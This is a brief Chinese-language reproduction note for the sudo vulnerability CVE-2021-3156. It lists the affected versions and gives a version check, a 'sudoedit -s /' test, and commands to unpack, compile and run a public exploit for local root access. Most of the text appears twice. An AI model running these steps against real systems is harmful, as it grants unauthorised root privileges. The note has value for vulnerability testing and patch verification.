CVE-2021-3156
目前影响版本:
1.8.2- 1.8.31p2
1.9.0- 1.9.5 p1
复现
kali
sudo --version 查看版本
如果存在漏洞,执行sudoedit -s /则返回如下
下载exp:
在tmp解压后编译执行:
tar -xvzf CVE-2021-3156_nss_poc_ubuntu.tar.gz
cd CVE-2021-3156/
make &&./sudo-hax-me-a-sandwich 0
1.8.2- 1.8.31p2
1.9.0- 1.9.5 p1
kali
sudo --version 查看版本
如果存在漏洞,执行sudoedit -s /则返回如下
下载exp:
在tmp解压后编译执行:
tar -xvzf CVE-2021-3156_nss_poc_ubuntu.tar.gz
cd CVE-2021-3156/
make &&./sudo-hax-me-a-sandwich 0